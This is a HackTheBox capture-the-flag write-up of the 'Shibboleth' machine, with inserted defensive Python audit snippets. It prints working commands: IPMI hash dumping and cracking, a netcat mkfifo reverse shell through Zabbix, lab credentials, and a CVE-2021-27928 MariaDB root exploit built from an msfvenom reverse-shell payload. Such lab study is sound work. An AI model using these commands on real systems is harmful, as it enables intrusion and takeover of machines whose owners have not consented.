Shibboleth - [HTB]



Shibboleth is a medium Linux machine from HackTheBox. The attacker has to enumerate both TCP and UDP ports and finds an IPMI service that can be used to retrieve IPMI hashes. Once the hashes are cracked, the attacker gains access to the Zabbix platform, from which a reverse shell as the zabbix user can be obtained. Finally, the attacker has to exploit a vulnerability in MariaDB (CVE-2021-27928) to become root.


As always, let's start by finding all open ports on the machine with Nmap.

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.053s latency).
Not shown: 64898 closed ports, 636 filtered ports
80/tcp open  http

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sU -n -T3 -oN AllPortsUDP.txt
Nmap scan report for
Host is up (0.18s latency).
Not shown: 999 closed udp ports (port-unreach)
623/udp open  asf-rmcp

Then we continue with a deeper scan of every open port to get more information about each service.

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 80
Nmap scan report for
Host is up (0.051s latency).

80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sU -sC -sV -p 623 -n -oN PortsDepthUDP.txt
Starting Nmap 7.92 ( ) at 2021-11-28 14:45 EST
Nmap scan report for
Host is up (0.17s latency).

623/udp open  asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

# Nmap done at Sun Nov 28 15:01:34 2021 

After adding the domain shibboleth.htb to the /etc/hosts file we can access this web page.

Web page

Searching for subdomains with ffuf, we find the following.

kali@kali:~/Documents/HTB/Shibboleth$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -o vhosts.txt -H "Host: FUZZ.shibboleth.htb" -fc 302

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

Looking for enumeration methods for the asf-rmcp port, there is a Rapid7 post describing a Metasploit module for dumping IPMI hashes.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                             Required  Description
   ----                  ---------------                             --------  -----------
   CRACK_COMMON          true                                        yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                               no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                  no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing common passwords for offline cracking, one per line
   RHOSTS                                      yes       The target host(s), see
   RPORT                 623                                         yes       The target port
   SESSION_MAX_ATTEMPTS  5                                           yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                           yes       Delay between session retries in seconds
   THREADS               1                                           yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing usernames, one per line

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > exploit

[+] - IPMI - Hash found: Administrator:e390caad02030000d690a68d88f1a6a30475a2b7e55e5cb775c0aa292af9a073aed44f9cf7377248a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e1fc0411bf8eef9cd04f8d792db9f3a37cae7bc5
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This hash can be cracked with hashcat using mode 7300 (IPMI2 RAKP HMAC-SHA1).

kali@kali:~/Documents/HTB/Shibboleth$ hashcat -h | grep IPMI
   7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
kali@kali:~/Documents/HTB/Shibboleth$ hashcat -m 7300 IPMI_hash.txt /usr/share/wordlists/rockyou.txt 
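To understand what the BMC actually handed out in that line, here is an added example (not part of the original writeup) that splits the hashcat mode 7300 string into the RAKP message 2 fields from the IPMI 2.0 spec: the digest is HMAC-SHA1 keyed with the user's password over SIDc, SIDm, Rc, Rm, GUIDm, role, username length and username, and the BMC sends it before the client has proven anything, which is why port 623 needs strong BMC passwords and network isolation. The hash string is the one printed above; the little-endian reading of the session IDs is my assumption from the wire format.

```python
import struct
from dataclasses import dataclass

# Constructed from the Metasploit output above. Mode 7300 format is
# "<username>:<hex salt>:<hex HMAC-SHA1>", the salt being the RAKP 2 data.
HASH_LINE = ("Administrator:"
             "e390caad02030000d690a68d88f1a6a30475a2b7e55e5cb7"
             "75c0aa292af9a073aed44f9cf7377248"
             "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:"
             "e1fc0411bf8eef9cd04f8d792db9f3a37cae7bc5")

@dataclass
class RakpHash:
    user: str
    sid_c: int        # console session id (4 bytes, assumed little-endian)
    sid_m: int        # managed-system (BMC) session id
    rand_c: bytes     # 16-byte console random number
    rand_m: bytes     # 16-byte BMC random number
    guid_m: bytes     # 16-byte BMC GUID
    role: int         # requested privilege level byte
    username: str     # username echoed inside the salt
    digest: bytes     # HMAC-SHA1(password, salt) returned by the BMC

def parse_rakp_hash(line: str) -> RakpHash:
    """Split a hashcat 7300 line into the RAKP fields the BMC leaked."""
    user, salt_hex, digest_hex = line.strip().split(":")
    salt = bytes.fromhex(salt_hex)
    digest = bytes.fromhex(digest_hex)
    if len(digest) != 20:
        raise ValueError("RAKP HMAC-SHA1 digest must be 20 bytes")
    # Fixed part: SIDc(4) SIDm(4) Rc(16) Rm(16) GUIDm(16) Role(1) ULen(1) = 58 bytes
    sid_c, sid_m, rand_c, rand_m, guid_m, role, ulen = struct.unpack(
        "<II16s16s16sBB", salt[:58])
    if 58 + ulen != len(salt):
        raise ValueError("username length byte does not match salt length")
    username = salt[58:58 + ulen].decode("ascii")
    if username != user:
        raise ValueError("username inside salt differs from hash prefix")
    return RakpHash(user, sid_c, sid_m, rand_c, rand_m, guid_m, role,
                    username, digest)
```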

These credentials can be used to access the Zabbix platform.


Zabbix allows users to execute commands on an agent, as described in this post. Hence, we can obtain a reverse shell.

To do so, we need to go to Configuration/Hosts/shibboleth.htb/Items and create a new item with the following command:

[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f &,nowait]
Zabbix RCE

Finally, we return to the item and click "Execute now" to run the command, obtaining a shell as the zabbix user.

$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)

Privilege Escalation 1

To become ipmi-svc we can reuse the same password.

zabbix@shibboleth:/tmp$ grep bash /etc/passwd
zabbix@shibboleth:/tmp$ su - ipmi-svc
Password: ilovepumkinpie1
ipmi-svc@shibboleth:~$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)
ipmi-svc@shibboleth:~$ cat user.txt

Privilege Escalation 2

Doing some enumeration with linpeas, we see that MySQL (MariaDB) is running as the root user.

root        1137  0.0  0.0   2608  1880 ?        S    17:14   0:00 /bin/sh /usr/bin/mysqld_safe
root       16481  1.1  2.9 1741484 118280 ?      Sl   18:43   0:03  _ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock

The credentials for accessing the database can be found in /etc/zabbix/zabbix_server.conf, which is readable by the ipmi-svc group.

ipmi-svc@shibboleth:/etc/zabbix$ ls -la
total 100
drwxr-xr-x  4 root     root      4096 Nov  8 11:02 .
drwxr-xr-x 96 root     root      4096 Nov  8 11:02 ..
-r--------  1 zabbix   zabbix      33 Apr 24  2021 peeesskay.psk
drwxr-xr-x  2 www-data root      4096 Apr 27  2021 web
-rw-r--r--  1 root     root     15317 May 25  2021 zabbix_agentd.conf
-rw-r--r--  1 root     root     15574 Oct 18 09:24 zabbix_agentd.conf.dpkg-dist
drwxr-xr-x  2 root     root      4096 Apr 27  2021 zabbix_agentd.d
-rw-r-----  1 root     ipmi-svc 21863 Apr 24  2021 zabbix_server.conf
-rw-r-----  1 root     ipmi-svc 22306 Oct 18 09:24 zabbix_server.conf.dpkg-dist

ipmi-svc@shibboleth:/etc/zabbix$ grep -Ev ^\#\|^$ zabbix_server.conf

Furthermore, the MariaDB version running on the box is affected by CVE-2021-27928, for which a PoC exists on GitHub.

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -pbloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 331
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
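The two findings that combine here are an unpatched MariaDB branch and a server that keeps running as root. As an added example (not from the original writeup), this small audit takes the process line and the version banner shown above and reports both conditions; the fixed releases are the ones listed in the CVE-2021-27928 advisory (10.2.37, 10.3.28, 10.4.18, 10.5.9), and the sample inputs are constructed copies of the output above.

```python
import re

# Constructed samples taken from the ps listing and the MariaDB banner above.
PS_LINE = ("root       16481  1.1  2.9 1741484 118280 ?      Sl   18:43   0:03  "
           "_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql "
           "--user=root --skip-log-error")
BANNER = "Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04"

# First release of each branch that fixed CVE-2021-27928 (wsrep_provider /
# wsrep_notify_cmd loading arbitrary libraries via SET GLOBAL).
FIXED = {(10, 2): (10, 2, 37), (10, 3): (10, 3, 28),
         (10, 4): (10, 4, 18), (10, 5): (10, 5, 9)}

def parse_version(banner):
    """Extract (major, minor, patch) from a MariaDB 'Server version' banner."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)-MariaDB", banner)
    if not m:
        raise ValueError("not a MariaDB version banner")
    return tuple(int(x) for x in m.groups())

def vulnerable_to_cve_2021_27928(version):
    """True/False for known branches, None when the branch is not in FIXED."""
    fixed = FIXED.get(version[:2])
    if fixed is None:
        return None
    return version < fixed

def mysqld_runs_as_root(ps_line):
    """True if mysqld is owned by root or is explicitly told to stay root."""
    fields = ps_line.split()
    if "mysqld" not in ps_line or not fields:
        return False
    return fields[0] == "root" or "--user=root" in fields

def audit(ps_line, banner):
    """Return a list of human-readable findings for the two risk conditions."""
    findings = []
    v = parse_version(banner)
    if vulnerable_to_cve_2021_27928(v):
        fixed = ".".join(map(str, FIXED[v[:2]]))
        findings.append(f"MariaDB {'.'.join(map(str, v))} predates the "
                        f"CVE-2021-27928 fix in {fixed}: upgrade")
    if mysqld_runs_as_root(ps_line):
        findings.append("mysqld runs as root: any library the server loads "
                        "runs as root instead of the mysql user; set --user=mysql")
    return findings
```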

To exploit it, we run the following commands and obtain a shell as root.

kali@kali:/tmp$ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4445 -f elf-so -o
kali@kali:/tmp$ python -m SimpleHTTPServer 
kali@kali:/tmp$ nc -lnvp 4455

ipmi-svc@shibboleth:/tmp$ wget
ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/";'
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query

kali@kali:~/Documents/HTB/Shibboleth$ nc -nlvp 4445
listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 41216
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt